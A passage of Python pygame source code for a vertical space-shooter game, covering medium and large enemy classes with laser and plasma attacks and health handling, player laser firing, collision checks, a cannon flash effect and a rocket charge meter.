self.lasers['laser'+str(self.laser_n)]['img2'] = self.laser_img2\r\n self.lasers['laser'+str(self.laser_n)]['laserY_change'] = 0\r\n self.lasers['laser'+str(self.laser_n)]['laserX_change'] = 0\r\n self.lasers['laser'+str(self.laser_n)]['laser1rect'] = self.laser_img1.get_rect()\r\n self.lasers['laser'+str(self.laser_n)]['laser2rect'] = self.laser_img2.get_rect()\r\n self.lasers['laser'+str(self.laser_n)]['laser1rect'].midtop = (self.enemy_rect.midbottom[0]-28, self.enemy_rect.midbottom[1])\r\n self.lasers['laser'+str(self.laser_n)]['laser2rect'].midtop = (self.enemy_rect.midbottom[0]+27, self.enemy_rect.midbottom[1])\r\n self.lasers['laser'+str(self.laser_n)]['cur_laser1_y'] = self.lasers['laser'+str(self.laser_n)]['laser1rect'].y\r\n self.lasers['laser'+str(self.laser_n)]['cur_laser2_y'] = self.lasers['laser'+str(self.laser_n)]['laser2rect'].y\r\n self.lasers['laser'+str(self.laser_n)]['cur_laser1_x'] = self.lasers['laser'+str(self.laser_n)]['laser1rect'].x\r\n self.lasers['laser'+str(self.laser_n)]['cur_laser2_x'] = self.lasers['laser'+str(self.laser_n)]['laser2rect'].x\r\n self.lasers['laser'+str(self.laser_n)]['laser1draw'] = True\r\n self.lasers['laser'+str(self.laser_n)]['laser2draw'] = True\r\n #print(self.lasers['laser'+str(self.laser_n)]['laser1rect'].midtop)\r\n #print(self.lasers['laser'+str(self.laser_n)]['laser2rect'].midtop)\r\n \r\n self.laser_n += 1\r\n\r\n def draw_laser(self, dt):\r\n global player_rect\r\n \r\n delete = []\r\n for laser in self.lasers:\r\n if (self.lasers[laser]['laser1rect'].top >= window_height+5 and\r\n self.lasers[laser]['laser2rect'].top >= window_height+5):\r\n delete.append(laser)\r\n continue\r\n\r\n self.lasers[laser]['laserY_change'] = self.laser_yspeed*dt\r\n self.lasers[laser]['laserX_change'] = self.laser_xspeed*dt\r\n\r\n if (self.lasers[laser]['laser1rect'].colliderect(player_rect) and\r\n self.lasers[laser]['laser1draw']):\r\n #self.lasers[laser]['laser1rect'].x = self.lasers[laser]['laser1rect'].y = -50\r\n self.lasers[laser]['laser1draw'] = False\r\n #print('hit')\r\n if (self.lasers[laser]['laser2rect'].colliderect(player_rect) and\r\n self.lasers[laser]['laser2draw']):\r\n #self.lasers[laser]['laser2rect'].x = self.lasers[laser]['laser2rect'].y = -50\r\n self.lasers[laser]['laser2draw'] = False\r\n #print('hit')\r\n \r\n self.lasers[laser]['cur_laser1_y'] += self.lasers[laser]['laserY_change']\r\n self.lasers[laser]['cur_laser2_y'] += self.lasers[laser]['laserY_change']\r\n self.lasers[laser]['laser1rect'].y = self.lasers[laser]['cur_laser1_y']\r\n self.lasers[laser]['laser2rect'].y = self.lasers[laser]['cur_laser2_y']\r\n self.lasers[laser]['cur_laser1_x'] -= self.lasers[laser]['laserX_change']\r\n self.lasers[laser]['cur_laser2_x'] += self.lasers[laser]['laserX_change']\r\n self.lasers[laser]['laser1rect'].x = self.lasers[laser]['cur_laser1_x']\r\n self.lasers[laser]['laser2rect'].x = self.lasers[laser]['cur_laser2_x']\r\n \r\n L1x = self.lasers[laser]['cur_laser1_x']\r\n L1y = self.lasers[laser]['cur_laser1_y']\r\n L2x = self.lasers[laser]['cur_laser2_x']\r\n L2y = self.lasers[laser]['cur_laser2_y']\r\n\r\n #print(L1x, L1y)\r\n #print(L2x, L2y)\r\n\r\n if self.lasers[laser]['laser1draw']:\r\n window.blit(self.lasers[laser]['img1'], (L1x, L1y))\r\n if self.lasers[laser]['laser2draw']:\r\n window.blit(self.lasers[laser]['img2'], (L2x, L2y))\r\n\r\n #print(delete)\r\n for key in delete:\r\n del self.lasers[key]\r\n\r\n def draw_enemy(self, dt, event_list):\r\n global powerups\r\n\r\n #print(self.pos_i)\r\n new_enemy_pos = self.enemy_rect_pos[self.pos_i]\r\n #print(self.enemy_rect.center, new_enemy_pos)\r\n #pg.time.set_timer(self.laser_event, self.laser_delay)\r\n\r\n if not self.new_pos_set and self.enemy_health > 0:\r\n\r\n if (math.fabs(self.enemy_rect.centerx-new_enemy_pos[0]) > 5 or\r\n math.fabs(self.enemy_rect.centery-new_enemy_pos[1]) > 5):\r\n if self.enemy_rect.center[0] - new_enemy_pos[0] > 5:\r\n self.cur_enemy_x += -self.enemy_xspeed*dt\r\n elif self.enemy_rect.center[0] - new_enemy_pos[0] < -5:\r\n self.cur_enemy_x += self.enemy_xspeed*dt\r\n if self.enemy_rect.center[1] < 200:\r\n self.cur_enemy_y += self.enemy_yspeed*dt\r\n self.enemy_rect.x = self.cur_enemy_x\r\n self.enemy_rect.y = self.cur_enemy_y\r\n\r\n else:\r\n #self.laser_time = 0\r\n #pg.time.set_timer(self.laser_event, self.laser_delay)\r\n #self.new_pos_acquired = True\r\n self.new_pos_set = True\r\n #self.timer = True\r\n self.time_elapsed = 0\r\n #self.enemy_clock.tick()\r\n\r\n elif self.new_pos_set and self.enemy_health > 0:\r\n self.enemy_rect.centerx, self.enemy_rect.centery = new_enemy_pos\r\n self.cur_enemy_x = self.enemy_rect.x\r\n self.cur_enemy_y = self.enemy_rect.y\r\n\r\n if self.enemy_health > 0:\r\n window.blit(self.enemy_img,\r\n (self.cur_enemy_x, self.cur_enemy_y))\r\n else:\r\n for event in event_list:\r\n if event.type == self.enemy_flash:\r\n self.flash_surface = self.enemy_img if self.flash_surface == self.empty_img else self.empty_img\r\n window.blit(self.flash_surface,\r\n (self.cur_enemy_x, self.cur_enemy_y))\r\n \r\n\r\n #if self.timer:\r\n if self.new_pos_set:\r\n self.time_elapsed += dt#self.enemy_clock.tick()\r\n\r\n if self.time_elapsed >= 3000:\r\n if self.pos_i == len(self.enemy_rect_pos)-1:\r\n self.pos_i = 0\r\n else:\r\n self.pos_i += 1\r\n \r\n self.new_pos_set = False\r\n #self.timer = False\r\n self.time_elapsed = 0\r\n\r\n '''\r\n self.laser_time += self.laser_clock.tick()\r\n \r\n if self.LL <= self.laser_time <= self.UL:\r\n #print(self.LL, self.laser_time, self.UL)\r\n self.add_laser()\r\n self.draw_laser(dt)\r\n self.set_laser_timer_lim = True\r\n #elif self.set_laser_timer_lim:\r\n # self.LL += self.DIFF\r\n # self.UL += self.DIFF\r\n # self.set_laser_timer_lim = False\r\n '''\r\n\r\n if self.enemy_health > 0 and powerups.pcollected != 'freeze':\r\n for event in event_list:\r\n if event.type == self.laser_event:\r\n self.add_laser()\r\n self.draw_laser(dt)\r\n\r\n self.check_health(event_list)\r\n\r\n def check_health(self, event_list):\r\n global score_value, spawn_medium_enemy_trigger1, spawn_large_enemy_trigger1\r\n global spawn_medium_enemy_trigger2, isinit_enemy_small_last, spawn_large_enemy_trigger2\r\n global enemy_small_killed\r\n\r\n if self.enemy_health <= 0:\r\n self.lasers.clear()\r\n \r\n if self.enemy_health <= 0:\r\n for event in event_list:\r\n if event.type == self.enemy_flash:\r\n self.num_flash += 1\r\n if self.num_flash >= 12:\r\n score_value += 10\r\n spawn_medium_enemy_trigger1 = False\r\n spawn_medium_enemy_trigger2 = False\r\n spawn_large_enemy_trigger1 = False\r\n spawn_large_enemy_trigger2 = False\r\n isinit_enemy_small_last = False\r\n self.__init__()\r\n init_enemy_small_pos()\r\n increase_lvl()\r\n pg.time.set_timer(self.enemy_flash, 0)\r\n pg.time.set_timer(self.laser_event, 0)\r\n enemy_small_killed = 0\r\n \r\nenemy_medium = EnemyMedium()\r\n\r\n\r\n#Large enemy properties and functions\r\nclass EnemyLarge():\r\n def __init__(self):\r\n self.enemy_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\enemy-large200.png').convert_alpha()\r\n #self.enemy_rect_pos = [(window_width*4/8, 200), (window_width*1/8, 200),\r\n # (window_width*4/8, 200), (window_width*7/8, 200)]\r\n #self.new_pos_acquired = False\r\n #self.new_pos_set = False\r\n #self.timer = False\r\n #self.time_elapsed = 0\r\n #self.pos_i = 0\r\n self.enemy_health = 40\r\n\r\n self.laser_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\minus(90)9x24.png').convert_alpha()\r\n self.laser_yspeed = 0.6\r\n self.laser_n = 1\r\n self.lasers = {}\r\n self.lasers_draw = False\r\n self.laser_delay = 300\r\n #self.laser_pause = 5000\r\n self.laser_event = pg.USEREVENT + 3\r\n self.laser_sound = mixer.Sound(r'.\\resources\\sounds\\laser3.wav')\r\n\r\n self.plasma_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\plasma-ball360(2).png').convert_alpha()\r\n self.plasma_yspeed = 0.4\r\n self.plasma_xspeed = 0.1\r\n #self.laser_n = 1\r\n self.plasmas = {}\r\n self.plasmas_draw = True\r\n #self.laser_delay = 700\r\n #self.laser_pause = 5000\r\n #self.laser_event = pg.USEREVENT + 1\r\n self.plasma_sound = mixer.Sound(r'.\\resources\\sounds\\electrical-shock-zap-short.wav')\r\n\r\n self.enemy_clock = pg.time.Clock()\r\n\r\n self.empty_img = pg.image.load('.\\\\resources\\\\images\\\\enemy\\\\empty160.png')\r\n self.flash_surface = self.enemy_img\r\n self.enemy_flash = pg.USEREVENT + 4\r\n self.num_flash = 0\r\n\r\n self.enemy_angle = 0\r\n self.rotate_enemy_event = pg.USEREVENT + 5\r\n self.rotate_delay = 10000\r\n\r\n self.weapon = 'plasma'\r\n\r\n self.set_params()\r\n\r\n def set_params(self):\r\n self.enemy_rect = self.enemy_img.get_rect()\r\n self.enemy_rect.center = (window_width/2, -200)\r\n self.enemy_xspeed = 0#0.5\r\n self.enemy_yspeed = 0#0.3\r\n self.set_enemy_speed = True\r\n self.enemy_xchange = 0\r\n self.enemy_ychange = 0\r\n self.cur_enemy_x = self.enemy_rect.x\r\n self.cur_enemy_y = self.enemy_rect.y\r\n self.rot_enemy = self.enemy_img\r\n self.rot_enemy_rect = self.enemy_rect.copy()\r\n self.plasma_sound.set_volume(0.3)\r\n self.laser_sound.set_volume(0.8)\r\n\r\n pg.time.set_timer(self.enemy_flash, 300)\r\n pg.time.set_timer(self.laser_event, self.laser_delay)\r\n #pg.time.set_timer(self.rotate_enemy_event, self.rotate_delay)\r\n\r\n self.set_plasma()\r\n\r\n def resize(self):\r\n global spawn_large_enemy_trigger2\r\n\r\n if spawn_large_enemy_trigger2 == False:\r\n self.enemy_rect.center = (window_width/2, -200)\r\n \r\n def add_laser(self):\r\n global mute, channels\r\n \r\n if mute == False:\r\n channels[0].play(self.laser_sound)\r\n\r\n if self.laser_n > 7:\r\n #pg.time.set_timer(self.laser_event, self.laser_pause)\r\n self.laser_n = 1\r\n\r\n self.lasers['laser'+str(self.laser_n)] = {}\r\n self.lasers['laser'+str(self.laser_n)]['img'] = self.laser_img\r\n self.lasers['laser'+str(self.laser_n)]['laserY_change'] = 0\r\n self.lasers['laser'+str(self.laser_n)]['laser1rect'] = self.laser_img.get_rect()\r\n #self.lasers['laser'+str(self.laser_n)]['laser2rect'] = self.laser_img.get_rect()\r\n self.lasers['laser'+str(self.laser_n)]['laser1rect'].midtop = (self.enemy_rect.right-65, self.enemy_rect.bottom)\r\n #self.lasers['laser'+str(self.laser_n)]['laser2rect'].midtop = (self.enemy_rect.midbottom[0]+27, self.enemy_rect.midbottom[1])\r\n self.lasers['laser'+str(self.laser_n)]['cur_laser1_y'] = self.lasers['laser'+str(self.laser_n)]['laser1rect'].y\r\n #self.lasers['laser'+str(self.laser_n)]['cur_laser2_y'] = self.lasers['laser'+str(self.laser_n)]['laser2rect'].y\r\n self.lasers['laser'+str(self.laser_n)]['laser1draw'] = True\r\n #self.lasers['laser'+str(self.laser_n)]['laser2draw'] = True\r\n #print(self.lasers['laser'+str(self.laser_n)]['laser1rect'].midtop)\r\n #print(self.lasers['laser'+str(self.laser_n)]['laser2rect'].midtop)\r\n \r\n self.laser_n += 1\r\n\r\n def draw_laser(self, dt):\r\n global player_rect\r\n \r\n delete = []\r\n for laser in self.lasers:\r\n if self.lasers[laser]['laser1rect'].top >= window_height+5:\r\n delete.append(laser)\r\n continue\r\n\r\n self.lasers[laser]['laserY_change'] = self.laser_yspeed*dt\r\n\r\n if (self.lasers[laser]['laser1rect'].colliderect(player_rect) and\r\n self.lasers[laser]['laser1draw']):\r\n #self.lasers[laser]['laser1rect'].x = self.lasers[laser]['laser1rect'].y = -50\r\n self.lasers[laser]['laser1draw'] = False\r\n #print('hit')\r\n \r\n self.lasers[laser]['cur_laser1_y'] += self.lasers[laser]['laserY_change']\r\n self.lasers[laser]['laser1rect'].y = self.lasers[laser]['cur_laser1_y']\r\n L1x = self.lasers[laser]['laser1rect'].x\r\n L1y = self.lasers[laser]['cur_laser1_y']\r\n\r\n #print(L1x, L1y)\r\n #print(L2x, L2y)\r\n\r\n if self.lasers[laser]['laser1draw']:\r\n window.blit(self.lasers[laser]['img'], (L1x, L1y))\r\n\r\n #print(delete)\r\n for key in delete:\r\n del self.lasers[key]\r\n\r\n def set_plasma(self):\r\n self.plasmas = {\r\n 'plasma1' : {\r\n 'Xchange' : -self.plasma_xspeed*1.2,\r\n 'Ychange' : self.plasma_yspeed,\r\n 'rect' : self.plasma_img.get_rect(w=16, h=16, midtop=(self.enemy_rect.left+62, self.enemy_rect.bottom)),\r\n #'cur_x' : self.plasmas['plasma1']['rect'].x,\r\n #'cur_y' : self.plasmas['plasma1']['rect'].y,\r\n 'draw' : True,\r\n 'pixel_travel' : 0,\r\n 'scale' : 0.0444,\r\n 'angle' : 0},\r\n 'plasma2' : {\r\n 'Xchange' : -self.plasma_xspeed/2,\r\n 'Ychange' : self.plasma_yspeed,\r\n #'rect' : self.plasma_img.get_rect(w=16, h=16, center=(self.plasmas['plasma1']['rect'].centerx+25,\r\n # self.plasmas['plasma1']['rect'].centery)),\r\n #'cur_x' : self.plasmas['plasma1']['rect'].x,\r\n #'cur_y' : self.plasmas['plasma1']['rect'].y,\r\n 'draw' : True,\r\n 'pixel_travel' : 0,\r\n 'scale' : 0.0444,\r\n 'angle' : 0},\r\n 'plasma3' : {\r\n 'Xchange' : self.plasma_xspeed/2,\r\n 'Ychange' : self.plasma_yspeed,\r\n #'rect' : self.plasma_img.get_rect(w=16, h=16, center=(self.plasmas['plasma2']['rect'].centerx+25,\r\n # self.plasmas['plasma1']['rect'].centery)),\r\n #'cur_x' : self.plasmas['plasma1']['rect'].x,\r\n #'cur_y' : self.plasmas['plasma1']['rect'].y,\r\n 'draw' : True,\r\n 'pixel_travel' : 0,\r\n 'scale' : 0.0444,\r\n 'angle' : 0},\r\n 'plasma4' : {\r\n 'Xchange' : self.plasma_xspeed*1.2,\r\n 'Ychange' : self.plasma_yspeed,\r\n #'rect' : self.plasma_img.get_rect(w=16, h=16, center=(self.plasmas['plasma3']['rect'].centerx+25,\r\n # self.plasmas['plasma1']['rect'].centery)),\r\n #'cur_x' : self.plasmas['plasma1']['rect'].x,\r\n #'cur_y' : self.plasmas['plasma1']['rect'].y,\r\n 'draw' : True,\r\n 'pixel_travel' : 0,\r\n 'scale' : 0.0444,\r\n 'angle' : 0}\r\n }\r\n\r\n for plasma in self.plasmas:\r\n if plasma != 'plasma1':\r\n prev_plasma = 'plasma'+str(int(plasma[-1])-1)\r\n self.plasmas[plasma]['rect'] = self.plasma_img.get_rect(w=16, h=16,\r\n center=(self.plasmas[prev_plasma]['rect'].centerx+25,\r\n self.plasmas[prev_plasma]['rect'].centery))\r\n self.plasmas[plasma]['cur_x'] = self.plasmas[plasma]['rect'].x\r\n self.plasmas[plasma]['cur_y'] = self.plasmas[plasma]['rect'].y\r\n \r\n def draw_plasma(self, dt):\r\n global player_rect, mute, channels\r\n\r\n #if self.plasmas['plasma1']['rect'].midtop == (self.enemy_rect.left+62, self.enemy_rect.bottom):\r\n if self.plasmas['plasma1']['rect'].top == self.enemy_rect.bottom:\r\n if mute == False:\r\n channels[2].play(self.plasma_sound)\r\n \r\n for plasma in self.plasmas:\r\n if self.plasmas[plasma]['rect'].top >= window_height+10:\r\n self.set_plasma()\r\n #if mute == False:\r\n # self.plasma_sound.play()\r\n break\r\n\r\n #self.plasmas[plasma]['Xchange'] = self.plasma_xspeed*dt\r\n #self.plasmas[plasma]['Ychange'] = self.plasma_yspeed*dt\r\n\r\n self.plasmas[plasma]['cur_x'] += self.plasmas[plasma]['Xchange']*dt\r\n self.plasmas[plasma]['cur_y'] += self.plasmas[plasma]['Ychange']*dt\r\n\r\n self.plasmas[plasma]['rect'].w = self.plasma_img.get_width()*self.plasmas[plasma]['scale']\r\n self.plasmas[plasma]['rect'].h = self.plasma_img.get_height()*self.plasmas[plasma]['scale']\r\n self.plasmas[plasma]['rect'].x = self.plasmas[plasma]['cur_x']\r\n self.plasmas[plasma]['rect'].y = self.plasmas[plasma]['cur_y']\r\n\r\n if (self.plasmas[plasma]['rect'].colliderect(player_rect) and\r\n self.plasmas[plasma]['draw']):\r\n self.plasmas[plasma]['draw'] = False\r\n\r\n Px = self.plasmas[plasma]['cur_x']\r\n Py = self.plasmas[plasma]['cur_y']\r\n\r\n P_surface = pg.transform.rotozoom(self.plasma_img,\r\n self.plasmas[plasma]['angle'],\r\n self.plasmas[plasma]['scale'])\r\n \r\n if self.plasmas[plasma]['draw']:\r\n window.blit(P_surface, self.plasmas[plasma]['rect'])#(Px, Py)\r\n\r\n self.plasmas[plasma]['pixel_travel'] += self.plasmas[plasma]['cur_y']\r\n if self.plasmas[plasma]['pixel_travel'] >= 10:\r\n self.plasmas[plasma]['pixel_travel'] = 0\r\n if self.plasmas[plasma]['rect'].bottom <= window_height-200:\r\n self.plasmas[plasma]['scale'] += 0.0015\r\n\r\n self.plasmas[plasma]['angle'] += 8\r\n \r\n def draw_enemy(self, dt, event_list):\r\n global mute, powerups\r\n\r\n if self.enemy_rect.centery < 150 and powerups.pcollected != 'freeze':\r\n self.enemy_yspeed = 0.15\r\n self.enemy_xspeed = 0\r\n elif self.enemy_rect.centery >= 150 and powerups.pcollected != 'freeze':\r\n if self.set_enemy_speed:\r\n self.enemy_yspeed = 0\r\n self.enemy_xspeed = random.choice([0.5, -0.5])\r\n self.set_enemy_speed = False\r\n self.set_plasma()\r\n pg.time.set_timer(self.rotate_enemy_event, self.rotate_delay)\r\n\r\n if (self.enemy_health > 0 and\r\n self.weapon == 'laser' and\r\n self.enemy_angle == 0 and\r\n powerups.pcollected != 'freeze'):\r\n for event in event_list:\r\n if event.type == self.laser_event:\r\n self.add_laser()\r\n self.draw_laser(dt)\r\n\r\n if (self.enemy_health > 0 and\r\n self.weapon == 'plasma' and\r\n self.enemy_angle == 0 and\r\n self.enemy_rect.centery >= 150 and\r\n powerups.pcollected != 'freeze'):\r\n self.draw_plasma(dt)\r\n\r\n if powerups.pcollected != 'freeze':\r\n if self.enemy_rect.left < 5:\r\n self.enemy_xspeed = 0.5\r\n elif self.enemy_rect.right > window_width-5:\r\n self.enemy_xspeed = -0.5\r\n\r\n if self.enemy_health > 0:\r\n self.cur_enemy_x += self.enemy_xspeed*dt\r\n self.cur_enemy_y += self.enemy_yspeed*dt\r\n #print(self.enemy_xspeed, end=' ' )\r\n\r\n self.enemy_rect.x = self.cur_enemy_x\r\n self.enemy_rect.y = self.cur_enemy_y\r\n\r\n for event in event_list:\r\n if event.type == self.rotate_enemy_event and powerups.pcollected != 'freeze':\r\n self.enemy_angle += 4\r\n self.lasers.clear()\r\n self.set_plasma()\r\n if self.weapon == 'plasma':\r\n self.weapon = 'laser'\r\n else:\r\n self.weapon = 'plasma'\r\n\r\n\r\n if self.enemy_health > 0:\r\n if not self.enemy_angle:\r\n window.blit(self.enemy_img,\r\n (self.cur_enemy_x, self.cur_enemy_y))\r\n else:\r\n self.enemy_angle += 4\r\n\r\n self.rot_enemy = pg.transform.rotate(self.enemy_img, self.enemy_angle)\r\n self.rot_enemy_rect = self.rot_enemy.get_rect(center=self.enemy_rect.center)\r\n\r\n self.flash_surface = self.rot_enemy\r\n\r\n window.blit(self.rot_enemy, self.rot_enemy_rect)\r\n \r\n if self.enemy_angle >= 180:\r\n self.enemy_angle = 0\r\n self.enemy_img = pg.transform.rotate(self.enemy_img, 180)\r\n if self.weapon == 'plasma':\r\n self.set_plasma()\r\n \r\n '''\r\n if self.weapon == 'plasma':\r\n self.set_plasma()\r\n self.weapon = 'laser'\r\n self.lasers.clear()\r\n else:\r\n self.lasers.clear()\r\n self.weapon = 'plasma'\r\n self.set_plasma()\r\n '''\r\n else:\r\n for event in event_list:\r\n if event.type == self.enemy_flash:\r\n self.flash_surface = self.rot_enemy if self.flash_surface == self.empty_img else self.empty_img\r\n window.blit(self.flash_surface,\r\n (self.cur_enemy_x, self.cur_enemy_y))\r\n '''\r\n if (self.enemy_health > 0 and\r\n self.weapon == 'laser' and\r\n self.enemy_angle == 0):\r\n for event in event_list:\r\n if event.type == self.laser_event:\r\n self.add_laser()\r\n self.draw_laser(dt)\r\n\r\n if (self.enemy_health > 0 and\r\n self.weapon == 'plasma' and\r\n self.enemy_angle == 0 and\r\n self.enemy_rect.centery >= 150):\r\n self.draw_plasma(dt)\r\n '''\r\n #for plasma in self.plasmas:\r\n # if self.plasmas[plasma]['rect'].bottom >= window_width+10:\r\n # self.set_plasma()\r\n # break\r\n\r\n self.check_health(event_list)\r\n\r\n def check_health(self, event_list):\r\n global score_value, spawn_large_enemy_trigger1, spawn_medium_enemy_trigger1\r\n global spawn_large_enemy_trigger2, isinit_enemy_small_last, spawn_medium_enemy_trigger2\r\n global enemy_small_killed\r\n \r\n if self.enemy_health <= 0:\r\n self.lasers.clear()\r\n \r\n for event in event_list:\r\n if event.type == self.enemy_flash:\r\n self.num_flash += 1\r\n if self.num_flash >= 12:\r\n score_value += 20\r\n spawn_large_enemy_trigger1 = False\r\n spawn_large_enemy_trigger2 = False\r\n spawn_medium_enemy_trigger1 = False\r\n spawn_medium_enemy_trigger2 = False\r\n isinit_enemy_small_last = False\r\n self.__init__()\r\n init_enemy_small_pos()\r\n increase_lvl()\r\n pg.time.set_timer(self.enemy_flash, 0)\r\n pg.time.set_timer(self.laser_event, 0)\r\n enemy_small_killed = 0\r\n\r\nenemy_large = EnemyLarge()\r\n\r\nspawn_large_enemy_trigger1 = False\r\nspawn_large_enemy_trigger2 = False\r\n\r\n\r\n#Flashing effect near the player battleship cannons\r\nflash_img = pg.image.load('.\\\\resources\\\\images\\\\bullet\\\\laser32.png').convert_alpha()\r\nblank_img = pg.image.load('.\\\\resources\\\\images\\\\bullet\\\\blank32.png').convert_alpha()\r\nflash_img_size = flash_img_w, flash_img_h = flash_img.get_size()\r\nflash_rect = flash_img.get_rect()\r\nflash1X, flash1Y = player_rect.x-8, player_rect.y+2\r\nflash2X, flash2Y = player_rect.x+player_img_w-24, player_rect.y+2\r\nshow_flash = True\r\nnum = 9\r\n\r\ndef draw_flash(prect, num):\r\n #global show_flash\r\n\r\n b1x, b1y = prect.x-8, prect.y+2\r\n b2x, b2y = prect.x+player_img_w-24, prect.y+2\r\n\r\n if 5 <= num < 10:\r\n #print('hi')\r\n window.blit(flash_img, (b1x, b1y))\r\n window.blit(flash_img, (b2x, b2y))\r\n if num == 9:\r\n return 0\r\n num += 1\r\n else:\r\n num += 1\r\n\r\n return num\r\n\r\n\r\n#Player laser bullets properties and functions\r\nlaser_img = pg.image.load('.\\\\resources\\\\images\\\\bullet\\\\minus32.png').convert_alpha()\r\nlaser_img_size = laser_img_w, laser_img_h = laser_img.get_size()\r\nlaser_rect = laser_img.get_rect()\r\nlaser_xspeed = 0\r\nlaser_yspeed = 1.2\r\nlasers = {}\r\ni = 1 #Laser number\r\nexplosion_sound = mixer.Sound(r'.\\resources\\sounds\\explosion1.wav')\r\n\r\ndef draw_laser(dt):\r\n global lasers, enemy_small, score_value, laser_img, enemy_medium\r\n global explosion_sound, hit_value, enemy_small_killed, channels\r\n\r\n delete = []\r\n for laser in lasers:\r\n if (lasers[laser]['laser1rect'].bottom <= -10 and\r\n lasers[laser]['laser2rect'].bottom <= -10):\r\n delete.append(laser)\r\n continue\r\n\r\n lasers[laser]['laserY_change'] = laser_yspeed*dt\r\n \r\n #Checking collision of lasers with different type of enemies \r\n for enemy in enemy_small:\r\n if (is_collide(enemy_small[enemy]['rect'], lasers[laser]['laser1rect']) and\r\n enemy_small[enemy]['alive']):\r\n lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_small[enemy]['alive'] = False\r\n score_value += 1\r\n hit_value += 1\r\n enemy_small_killed += 1\r\n if mute == False:\r\n #explosion_sound = mixer.Sound(r'.\\resources\\sounds\\explosion1.wav')\r\n channels[1].play(explosion_sound)\r\n if (is_collide(enemy_small[enemy]['rect'], lasers[laser]['laser2rect']) and\r\n enemy_small[enemy]['alive']):\r\n lasers[laser]['laser2rect'].x = lasers[laser]['laser2rect'].y = -50\r\n enemy_small[enemy]['alive'] = False\r\n score_value += 1\r\n hit_value += 1\r\n enemy_small_killed += 1\r\n if mute == False:\r\n #explosion_sound = mixer.Sound(r'.\\resources\\sounds\\explosion2.wav')\r\n channels[1].play(explosion_sound)\r\n\r\n if (is_collide_medium(enemy_medium.enemy_rect, lasers[laser]['laser1rect']) and\r\n enemy_medium.enemy_health > 0):\r\n lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_medium.enemy_health -= 1\r\n hit_value += 1\r\n #print(enemy_medium.enemy_health)\r\n if mute == False:\r\n channels[1].play(explosion_sound)\r\n if (is_collide_medium(enemy_medium.enemy_rect, lasers[laser]['laser2rect']) and\r\n enemy_medium.enemy_health > 0):\r\n lasers[laser]['laser2rect'].x = lasers[laser]['laser2rect'].y = -50\r\n enemy_medium.enemy_health -= 1\r\n hit_value += 1\r\n #print(enemy_medium.enemy_health)\r\n if mute == False:\r\n channels[1].play(explosion_sound)\r\n\r\n if (is_collide_medium(enemy_large.enemy_rect, lasers[laser]['laser1rect']) and\r\n enemy_large.enemy_health > 0):\r\n lasers[laser]['laser1rect'].x = lasers[laser]['laser1rect'].y = -50\r\n enemy_large.enemy_health -= 1\r\n hit_value += 1\r\n #print(enemy_large.enemy_health)\r\n if mute == False:\r\n channels[1].play(explosion_sound)\r\n if (is_collide_medium(enemy_large.enemy_rect, lasers[laser]['laser2rect']) and\r\n enemy_large.enemy_health > 0):\r\n lasers[laser]['laser2rect'].x = lasers[laser]['laser2rect'].y = -50\r\n enemy_large.enemy_health -= 1\r\n hit_value += 1\r\n #print(enemy_large.enemy_health)\r\n if mute == False:\r\n channels[1].play(explosion_sound)\r\n \r\n lasers[laser]['cur_laser1_y'] -= lasers[laser]['laserY_change']\r\n lasers[laser]['cur_laser2_y'] -= lasers[laser]['laserY_change']\r\n lasers[laser]['laser1rect'].y = lasers[laser]['cur_laser1_y']\r\n lasers[laser]['laser2rect'].y = lasers[laser]['cur_laser2_y']\r\n L1x = lasers[laser]['laser1rect'].x\r\n L1y = lasers[laser]['cur_laser1_y']\r\n L2x = lasers[laser]['laser2rect'].x\r\n L2y = lasers[laser]['cur_laser2_y']\r\n\r\n window.blit(lasers[laser]['img'], (L1x, L1y))\r\n window.blit(lasers[laser]['img'], (L2x, L2y))\r\n\r\n for key in delete:\r\n del lasers[key]\r\n \r\n\r\ndef add_laser():\r\n global lasers, i, laser_img, player_rect, mute, channels\r\n\r\n if mute == False:\r\n laser_sound = mixer.Sound(r'.\\resources\\sounds\\laser1.wav')\r\n channels[3].play(laser_sound)\r\n\r\n if i > 20:\r\n i = 0\r\n\r\n lasers['laser'+str(i)] = {}\r\n lasers['laser'+str(i)]['img'] = pg.image.load('.\\\\resources\\\\images\\\\bullet\\\\minus32.png')\r\n lasers['laser'+str(i)]['laserY_change'] = 0\r\n lasers['laser'+str(i)]['cur_laser1_y'] = player_rect.y-32\r\n lasers['laser'+str(i)]['cur_laser2_y'] = player_rect.y-32\r\n lasers['laser'+str(i)]['laser1rect'] = laser_img.get_rect()\r\n lasers['laser'+str(i)]['laser2rect'] = laser_img.get_rect()\r\n lasers['laser'+str(i)]['laser1rect'].x = player_rect.x-8\r\n lasers['laser'+str(i)]['laser1rect'].y = player_rect.y + 5\r\n lasers['laser'+str(i)]['laser2rect'].x = player_rect.x+player_img_w-24\r\n lasers['laser'+str(i)]['laser2rect'].y = player_rect.y + 5\r\n \r\n i += 1\r\n\r\n\r\ndef is_collide(enrect, lrect):\r\n if int(math.fabs(lrect.midtop[1] - enrect.center[1])) <= 55:\r\n if enrect.left <= lrect.midtop[0] <= enrect.right:\r\n return True\r\n\r\n return False\r\n\r\ndef is_collide_medium(enrect, lrect):\r\n if int(math.fabs(lrect.midtop[1] - enrect.center[1])) <= 80:\r\n if enrect.left <= lrect.midtop[0] <= enrect.right:\r\n return True\r\n\r\n return False\r\n\r\n#Charge value properties and functions(for rocket)\r\ncharge_value = 0\r\ncharge_img_list = []\r\nfor i in range(1,13):\r\n charge_img_list.append(pg.image.load(fr'.\\resources\\images\\power-up\\charging-up\\loader{i}(80).png').convert_alpha())\r\ncharge_rect = charge_img_list[0].get_rect(left=10, bottom=window_height-10)\r\nrocket_img1 = pg.image.load(r'.\\resources\\images\\power-up\\charging-up\\missile-fill56.png').convert_alpha()\r\nrocket_rect = rocket_img1.get_rect(center=charge_rect.center)\r\nhit_value = 0\r\ncharge_up_sound = mixer.Sound(r'.\\resources\\sounds\\charge-up.wav')\r\ncharge_rot_img = charge_img_list[11]\r\ncharge_rot_angle = 1\r\n\r\ndef draw_charge_quantity():\r\n global charge_value, charge_img_list, charge_rect, rocket_img1, rocket_rect\r\n global hit_value, mute, charge_up_sound, charge_rot_img, charge_rot_angle, channels\r\n\r\n if charge_value > 0:\r\n if charge_value == 12:\r\n charge_rot_img = pg.transform.rotate(charge_img_list[11], charge_rot_angle)\r\n charge_rot_rect = 